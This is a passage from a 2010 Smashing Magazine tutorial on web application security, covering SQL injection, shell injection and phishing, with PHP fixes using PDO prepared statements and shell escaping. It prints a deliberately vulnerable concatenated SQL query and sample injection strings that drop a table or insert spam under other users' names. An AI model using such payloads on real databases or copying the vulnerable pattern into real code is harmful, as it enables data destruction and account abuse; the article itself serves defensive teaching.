  $sql = "INSERT INTO Messages (
            user, message
          ) VALUES (
            '$user', '$message'
          )";

  return mysql_query($sql);
}
?>

The function is oversimplified here, but it exemplifies the problem. The attacker could enter something like

test');DROP TABLE Messages;--

When this gets passed to the database, it could end up dropping the Messages table, causing you and your users a lot of grief. This kind of an attack calls attention to the attacker, but little else. It’s far more likely for an attacker to use this kind of attack to insert spammy data on behalf of other users. Consider this message instead:

test'), ('user2', 'Cheap medicine at ...'), ('user3', 'Cheap medicine at ...

Here the attacker has successfully managed to insert spammy messages into the comment streams from user2 and user3 without needing access to their accounts. The attacker could also use this to download your entire user table that possibly includes usernames, passwords and email addresses.

Fortunately, we can use prepared statements to get around this problem. In PHP, the PDO abstraction layer makes it easy to use prepared statements even if your database itself doesn’t support them. We could change our code to use PDO.

<?php
function save_message($user, $message)
{
  // $dbh is a global database handle
  global $dbh;

  $stmt = $dbh->prepare('
                     INSERT INTO Messages (
                          user, message
                     ) VALUES (
                          ?, ?
                     )');
  return $stmt->execute(array($user, $message));
}
?>

This protects us from SQL injection by correctly making sure that everything in $user goes into the user field and everything in $message goes into the message field even if it contains database meta characters.

There are cases where it’s hard to use prepared statements. For example, if you have a list of values in an IN clause. However, since our SQL statements are always generated by code, it is possible to first determine how many items need to go into the IN clause, and add as many ? placeholders instead.
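
A sketch of that IN-clause technique with PDO, reusing the $dbh handle from the earlier example (the ID list is made up):

<?php
// build one "?" placeholder per value, then bind the values positionally
$ids = array(3, 7, 42);
$placeholders = implode(',', array_fill(0, count($ids), '?'));
$stmt = $dbh->prepare("SELECT user, message FROM Messages
                       WHERE id IN ($placeholders)");
$stmt->execute($ids);
?>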

5. Shell injection

Similar to SQL injection, the attacker tries to craft an input string to gain shell access to your web server. Once they have shell access, they could potentially do a lot more. Depending on access privileges, they could add JavaScript to your HTML pages, or gain access to other internal systems on your network.

Shell injection can take place whenever you pass untreated user input to the shell, for example by using the system() or exec() functions, or the backtick operator. There may be more functions depending on the language you use when building your web app.

The solution is the same as for XSS attacks. You need to validate and sanitize all user inputs appropriately for where they will be used. For data that gets written back into an HTML page, we use PHP’s filter_input() function with the FILTER_SANITIZE_SPECIAL_CHARS flag. For data that gets passed to the shell, we use the escapeshellcmd() and escapeshellarg() functions. It’s also a good idea to validate the input to make sure it only contains a whitelist of characters. Always use a whitelist instead of a blacklist. Attackers find inventive ways of getting around a blacklist.
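
For instance (a sketch; the command and parameter are made up):

<?php
// escapeshellarg() wraps the value in single quotes and escapes any
// embedded quotes, so input like "; rm -rf /" stays one literal argument
$file = $_GET['file'];
system('/usr/bin/file ' . escapeshellarg($file));
?>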

If an attacker can gain shell access to your box, all bets are off. You may need to wipe everything off that box and reimage it. If any passwords or secret keys were stored on that box (in configuration files or source code), they will need to be changed at all locations where they are used. This could prove quite costly for your organization.

6. Phishing

Phishing is the process where an attacker tricks your users into handing over their login credentials. The attacker may create a page that looks exactly like your login page, and ask the user to log in there by sending them a link via e-mail, IM, Facebook, or something similar. Since the attacker’s page looks identical to yours, the user may enter their login credentials without realizing that they’re on a malicious site. The primary method to protect your users from phishing is user training, and there are a few things that you could do for this to be effective.

  1. Always serve your login page over SSL. This requires more server resources, but it ensures that the user’s browser verifies that the page isn’t being redirected to a malicious site.
  2. Use one and only one URL for user log in, and make it short and easy to recognize. For our example website, we could use https://login.mybiz.com as our login URL. It’s important that when the user sees a login form for our website, they also see this URL in the URL bar. That trains users to be suspicious of login forms on other URLs.
  3. Do not allow partners to ask your users for their credentials on your site. Instead, if partners need to pull user data from your site, provide them with an OAuth based API. This is also known as the Password Anti-Pattern.
  4. Alternatively, you could use something like a sign-in image (sometimes called a sign-in seal) that some websites are starting to use (e.g. Bank of America, Yahoo!). This is an image that the user selects on your website, that only the user and your website know about. When the user sees this image on the login page, they know that this is the right page. Note that if you use a sign-in seal, you should also use frame busting to make sure an attacker cannot embed your sign-in image page in their phishing page using an iframe.

If a user is trained to hand over their password to anyone who asks for it, then their data isn’t safe.

Summary

While we’ve covered a lot in this article, it still only skims the surface of web application security. Any developer interested in building truly secure applications has to be on top of their game at all times. Stay up to date with various security related mailing lists, and make sure all developers on your team are clued in. Sometimes it may be necessary to sacrifice features for security, but the alternative is far scarier.

Finally, I’d like to thank the Yahoo! Paranoids for all their help in writing this article.

Further reading

  1. OWASP Top 10 security risks
  2. XSS
  3. CSRF
  4. Phishing
  5. Code injection
  6. PHP’s input filters
  7. Password anti-pattern
  8. OAuth
  9. Facebook Like button click-jacking
  10. Anti-anti frame-busting
  11. The Yahoo! Security Center also has articles on how users can protect themselves online.

© Philip Tellis for Smashing Magazine, 2010.

